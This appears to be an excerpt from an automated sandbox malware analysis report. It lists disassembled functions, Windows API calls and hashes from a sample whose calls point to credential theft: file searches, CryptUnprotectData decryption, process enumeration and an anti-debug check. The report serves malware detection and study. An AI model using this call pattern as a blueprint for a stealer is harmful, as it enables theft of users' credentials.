                                                                                    • Instruction ID: 591a4703b72fe71aa373ebdc6cd180767c9b728ba7d7680c081136e576a94052
                                                                                    • Opcode Fuzzy Hash: cb963d4a19e0741f27c6405a3099effca6cff126aea0ca95f281292b31be4223
                                                                                    • Instruction Fuzzy Hash: 3B91A776900104ABCB14FBB1EC469ED733DAF84304F40856EF81A961C1EE389B5DCB9A
                                                                                    Function 02D1F917 Relevance: 12.3, APIs: 8, Instructions: 275fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                      • Part of subcall function 02D2AB87: lstrcpy.KERNEL32(00000000,?), ref: 02D2ABD9
                                                                                      • Part of subcall function 02D2AB87: lstrcat.KERNEL32(00000000), ref: 02D2ABE9
                                                                                      • Part of subcall function 02D2AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D2AC2C
                                                                                      • Part of subcall function 02D2AC17: lstrcpy.KERNEL32(00000000), ref: 02D2AC6B
                                                                                      • Part of subcall function 02D2AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D2AC79
                                                                                      • Part of subcall function 02D2AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D2AB6C
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 02D1F985
                                                                                    • StrCmpCA.SHLWAPI(?,004215BC), ref: 02D1F9D6
                                                                                    • StrCmpCA.SHLWAPI(?,004215C0), ref: 02D1F9EC
                                                                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 02D1FD18
                                                                                    • FindClose.KERNEL32(000000FF), ref: 02D1FD2A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 3334442632-0
                                                                                    • Opcode ID: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                                                                    • Instruction ID: 9830ccefbec5e7ad5708581cdeb3d0d8780ffb1ede18b722617bd13499c2e083
                                                                                    • Opcode Fuzzy Hash: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                                                                    • Instruction Fuzzy Hash: E3B11071900228EBCB24FF60DD95EEE737AEF65304F4081A9944A56650EF319F49CFA1
                                                                                    Function 0040E430 Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 514fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00420D73), ref: 0040E4A2
                                                                                    • StrCmpCA.SHLWAPI(?,004214F8), ref: 0040E4F2
                                                                                    • StrCmpCA.SHLWAPI(?,004214FC), ref: 0040E508
                                                                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0040EBDF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                                                                    • String ID: \*.*$@
                                                                                    • API String ID: 433455689-2355794846
                                                                                    • Opcode ID: f66feada1159486c5f539b2798b5b41736558756ad5056c64c98908e290d890f
                                                                                    • Instruction ID: 32b04220dc81db1066fec36fe382e2e0147ddb409d88bf53f78a4e8ff9751907
                                                                                    • Opcode Fuzzy Hash: f66feada1159486c5f539b2798b5b41736558756ad5056c64c98908e290d890f
                                                                                    • Instruction Fuzzy Hash: 2612D5719111189ACB14FB71DD96EED7338AF54314F4045AEB00A62091EF386FDACFAA
                                                                                    Function 02D11937 Relevance: 11.0, APIs: 7, Instructions: 492fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042511C,?,?,?,004251C4,?,?,00000000,?,00000000), ref: 02D11B8A
                                                                                    • StrCmpCA.SHLWAPI(?,0042526C), ref: 02D11BDA
                                                                                    • StrCmpCA.SHLWAPI(?,00425314), ref: 02D11BF0
                                                                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 02D11FA7
                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 02D12031
                                                                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 02D12087
                                                                                    • FindClose.KERNEL32(000000FF), ref: 02D12099
                                                                                      • Part of subcall function 02D2AB87: lstrcpy.KERNEL32(00000000,?), ref: 02D2ABD9
                                                                                      • Part of subcall function 02D2AB87: lstrcat.KERNEL32(00000000), ref: 02D2ABE9
                                                                                      • Part of subcall function 02D2AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D2AC2C
                                                                                      • Part of subcall function 02D2AC17: lstrcpy.KERNEL32(00000000), ref: 02D2AC6B
                                                                                      • Part of subcall function 02D2AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D2AC79
                                                                                      • Part of subcall function 02D2AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D2AB6C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 1415058207-0
                                                                                    • Opcode ID: 938f2ba7dd2a3d64883e0b34e36389f7e533753778dd0480aca93901e7f43848
                                                                                    • Instruction ID: eb4ca3e403c2f08160a8d4297ffa629db55e53ca92ef40468b56c4801151ec00
                                                                                    • Opcode Fuzzy Hash: 938f2ba7dd2a3d64883e0b34e36389f7e533753778dd0480aca93901e7f43848
                                                                                    • Instruction Fuzzy Hash: 4D12C071914228EBCF19EB60DD94EED737AEF64704F4041A9A50A66690EF706F8CCF60
                                                                                    Function 02D1E077 Relevance: 10.9, APIs: 7, Instructions: 370fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                      • Part of subcall function 02D2AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D2AC2C
                                                                                      • Part of subcall function 02D2AC17: lstrcpy.KERNEL32(00000000), ref: 02D2AC6B
                                                                                      • Part of subcall function 02D2AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D2AC79
                                                                                      • Part of subcall function 02D2AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D2AB6C
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,004214C0,00420C2E), ref: 02D1E0C5
                                                                                    • StrCmpCA.SHLWAPI(?,004214C8), ref: 02D1E115
                                                                                    • StrCmpCA.SHLWAPI(?,004214CC), ref: 02D1E12B
                                                                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 02D1E647
                                                                                    • FindClose.KERNEL32(000000FF), ref: 02D1E659
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 2325840235-0
                                                                                    • Opcode ID: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                                                                    • Instruction ID: 5fd3b62a91358be6d28c7f757882d9d383de9ffc8434f6491d47793cd05ec55f
                                                                                    • Opcode Fuzzy Hash: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                                                                    • Instruction Fuzzy Hash: DEF19075914238DACB19EB60DD94EEEB33AEF64704F8051DAA04A62550EF346F8DCF60
                                                                                    Function 02D1CA87 Relevance: 10.6, APIs: 7, Instructions: 93stringencryptionCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • memset.MSVCRT ref: 02D1CABA
                                                                                    • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 02D1CAD8
                                                                                    • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 02D1CAE3
                                                                                    • memcpy.MSVCRT(?,?,?), ref: 02D1CB79
                                                                                    • lstrcat.KERNEL32(?,00420B46), ref: 02D1CBAA
                                                                                    • lstrcat.KERNEL32(?,00420B47), ref: 02D1CBBE
                                                                                    • lstrcat.KERNEL32(?,00420B4E), ref: 02D1CBDF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                                                                    • String ID:
                                                                                    • API String ID: 1498829745-0
                                                                                    • Opcode ID: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                                                                    • Instruction ID: 0e9cdc6e11c07c319578700b75d19e87b7154ab819ddfcaa1ff856a8cc5b99f8
                                                                                    • Opcode Fuzzy Hash: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                                                                    • Instruction Fuzzy Hash: DF417178944219EFDB10DFD0ED88BEEBBB9BB44304F1045A9E509A6280D7745A84CF92
                                                                                    Function 0040C820 Relevance: 10.6, APIs: 7, Instructions: 93stringencryptionCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • memset.MSVCRT ref: 0040C853
                                                                                    • lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,02E35F60), ref: 0040C871
                                                                                    • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                                                                    • memcpy.MSVCRT(?,?,?), ref: 0040C912
                                                                                    • lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                                                                    • lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                                                                    • lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                                                                    • String ID:
                                                                                    • API String ID: 1498829745-0
                                                                                    • Opcode ID: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                                                                    • Instruction ID: 73a89fe7b99aa7d2364cb4d3d60341f0774d48a816bcca14cb071eff5a8018ea
                                                                                    • Opcode Fuzzy Hash: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                                                                    • Instruction Fuzzy Hash: 694164B8944219EFDB10DFE4DD89BEEBBB8BB44304F1041A9F509A6280D7745A84CF95
                                                                                    Function 00409AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                                                                    • LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                                                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                                                                    • LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: BinaryCryptLocalString$AllocFree
                                                                                    • String ID: N@
                                                                                    • API String ID: 4291131564-4229412743
                                                                                    • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                                                    • Instruction ID: b446a55777cc1d1e4698a5b325ac1ac72e8f4b69ff9cac50ab15cfe2fa8c9284
                                                                                    • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                                                    • Instruction Fuzzy Hash: 4811A4B4240208BFEB10CFA4DC95FAA77B5FB89714F208059FA159B3D0C776A901CB54
                                                                                    Function 02D27DF7 Relevance: 7.6, APIs: 5, Instructions: 114memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                    • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 02D27E48
                                                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 02D27E60
                                                                                    • GetKeyboardLayoutList.USER32(?,00000000), ref: 02D27E74
                                                                                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 02D27EC9
                                                                                    • LocalFree.KERNEL32(00000000), ref: 02D27F89
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                                                    • String ID:
                                                                                    • API String ID: 3090951853-0
                                                                                    • Opcode ID: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                                                                    • Instruction ID: ba3c82c63891615024c709c063a6017c731f091b2c7a0909ee4a9b1f35a66ed0
                                                                                    • Opcode Fuzzy Hash: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                                                                    • Instruction Fuzzy Hash: 91413871945228EBDB24DF94DC88BEDB3B5EB54708F104199E009A6290DB346F89CFA0
                                                                                    Function 02D2B5A1 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsDebuggerPresent.KERNEL32 ref: 02D2BE09
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 02D2BE1E
                                                                                    • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 02D2BE29
                                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 02D2BE45
                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 02D2BE4C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                    • String ID:
                                                                                    • API String ID: 2579439406-0
                                                                                    • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                                                    • Instruction ID: a52ab96fe1d640f57b8c449797262d8359e57c31ce0bb4dc0f386393e24511a7
                                                                                    • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                                                    • Instruction Fuzzy Hash: 6D21A5BC5002159FDB14DF69F8856963BF4FB0A318F50403AE90987364DBB05D85EF49
                                                                                    Function 02D174A7 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000008,00000400), ref: 02D174B4
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02D174BB
                                                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 02D174E8
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 02D1750B
                                                                                    • LocalFree.KERNEL32(?), ref: 02D17515
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                                                                    • String ID:
                                                                                    • API String ID: 2609814428-0
                                                                                    • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                                                    • Instruction ID: 6a7893c3fde123bf84894a3c8250eaa7e7fc81cefcd583bc8cbb2f33e2230e60
                                                                                    • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                                                    • Instruction Fuzzy Hash: B8010075A80208BBEB10DFD4DD45F9D77B9EB44704F104155F705AA2C0D770AA00CB65
                                                                                    Function 00407240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90), ref: 0040724D
                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407254
                                                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00407281
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00407C90,80000001,004161C4), ref: 004072A4
                                                                                    • LocalFree.KERNEL32(?,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 004072AE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                                                                    • String ID:
                                                                                    • API String ID: 3657800372-0
                                                                                    • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                                                    • Instruction ID: ec186dc502c88c98e3638293fff085d95328f9e4ca1f8ca95b137b7d6c986ae9
                                                                                    • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                                                    • Instruction Fuzzy Hash: 900100B5A80208BBEB10DFD4DD45F9E77B9EB44704F104159FB05BA2C0D674AA018B66
                                                                                    Function 02D29867 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02D29885
                                                                                    • Process32First.KERNEL32(00420ACA,00000128), ref: 02D29899
                                                                                    • Process32Next.KERNEL32(00420ACA,00000128), ref: 02D298AE
                                                                                    • StrCmpCA.SHLWAPI(?,00000000), ref: 02D298C3
                                                                                    • CloseHandle.KERNEL32(00420ACA), ref: 02D298E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                    • String ID:
                                                                                    • API String ID: 420147892-0
                                                                                    • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                                                    • Instruction ID: 044d35c04d6270df2b7ffbdb2f91f29e2262a5997f40b477c87aa300f8ddf1e6
                                                                                    • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                                                    • Instruction Fuzzy Hash: 76014C79A40218FFCB20DFE4CC54BEDB7F9EF19304F144189A505A6240D7759A44CF61
                                                                                    Function 00419600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041961E
                                                                                    • Process32First.KERNEL32(00420ACA,00000128), ref: 00419632
                                                                                    • Process32Next.KERNEL32(00420ACA,00000128), ref: 00419647
                                                                                    • StrCmpCA.SHLWAPI(?,00000000), ref: 0041965C
                                                                                    • CloseHandle.KERNEL32(00420ACA), ref: 0041967A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                    • String ID:
                                                                                    • API String ID: 420147892-0
                                                                                    • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                                                    • Instruction ID: 11d567adce4b572477f284a2ec541547db87c4b6fd8ba8cb36d7f0fd64301d48
                                                                                    • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                                                    • Instruction Fuzzy Hash: F201E9B9A40208ABCB24DFA5C958BEEB7F9EB49700F104189E90996250D7389F81CF61
                                                                                    Function 02D1E697 Relevance: 6.5, APIs: 4, Instructions: 514fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                      • Part of subcall function 02D2AB87: lstrcpy.KERNEL32(00000000,?), ref: 02D2ABD9
                                                                                      • Part of subcall function 02D2AB87: lstrcat.KERNEL32(00000000), ref: 02D2ABE9
                                                                                      • Part of subcall function 02D2AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D2AC2C
                                                                                      • Part of subcall function 02D2AC17: lstrcpy.KERNEL32(00000000), ref: 02D2AC6B
                                                                                      • Part of subcall function 02D2AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D2AC79
                                                                                      • Part of subcall function 02D2AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D2AB6C
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214F0,00420D73), ref: 02D1E709
                                                                                    • StrCmpCA.SHLWAPI(?,004214F8), ref: 02D1E759
                                                                                    • StrCmpCA.SHLWAPI(?,004214FC), ref: 02D1E76F
                                                                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 02D1EE46
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 433455689-0
                                                                                    • Opcode ID: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                                                                                    • Instruction ID: c9a9a5f0bdca60d0dcb3393a8f98d8d10a81aaf290f611023890ce5c05f4585d
                                                                                    • Opcode Fuzzy Hash: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                                                                                    • Instruction Fuzzy Hash: D512FD71A10228EBCB18FB60DD95EED737AEF64708F4041ADA50A56690EE345F8CCF61
                                                                                    Function 02D29107 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CryptBinaryToStringA.CRYPT32(00000000,02D153EB,40000001,00000000,00000000,?,02D153EB), ref: 02D29127
                                                                                    Memory Dump Source
